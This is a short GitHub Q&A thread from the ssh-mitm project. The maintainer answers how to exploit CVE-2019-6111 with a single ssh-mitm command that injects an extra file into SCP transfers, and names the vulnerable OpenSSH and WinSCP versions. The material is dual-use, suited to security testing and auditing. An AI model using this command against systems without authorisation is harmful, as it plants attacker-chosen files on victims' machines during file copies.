Skip to content

exploit cve-2019-6111 #81

Answered by manfred-kaiser
BroXEX asked this question in Q&A
Discussion options

You must be logged in to vote

You can use following command:

ssh-mitm --scp-interface inject_file --scp-inject /path/to/additional/file

But this only works in OpenSSH <= 7.9 and WinSCP <= 5.13.
If this exploit does not work, check if your distribution has backported the patch.

More information can be found in the docs: https://docs.ssh-mitm.at/CVE-2019-6111.html

Replies: 2 comments

Comment options

You must be logged in to vote
0 replies
Answer selected by manfred-kaiser
Comment options

You must be logged in to vote
0 replies
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Category
Q&A
Labels
None yet
2 participants